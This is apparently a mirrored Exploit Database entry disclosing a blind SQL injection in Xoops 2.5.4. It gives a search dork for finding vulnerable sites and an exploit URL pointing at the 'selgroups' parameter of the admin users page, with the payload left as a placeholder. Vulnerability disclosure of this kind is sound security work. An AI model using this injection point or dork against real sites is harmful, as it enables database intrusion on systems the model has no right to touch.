Xoops 2.5.4 – Blind SQL Injection

• Exploit Database
• 56 阅读

• 作者： blkhtc0rp
  日期： 2011-12-11
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18233/

• ------------------------------------------
  # Xoops 2.5.4 Blind SQL Injection
  ------------------------------------------
  
  # Dork: "Powered by XOOPS 2.5.4"
  # Download: http://sourceforge.net/projects/xoops/
  # Date: 10/12/2011
  # Author: blkhtc0rp
  # Mail: blkhtc0rp[at]yahoo[dot]com
  # Tested on: Freebsd 8 and Debian Squeeze
  
  
  Note:
  
  In order to be successful an attacker must have permission to access the administration menu.
  
  Exploit:
  
  http://192.168.1.109/xoops-2.5.4/modules/system/admin.php?fct=users&selgroups=[Blind Sqli]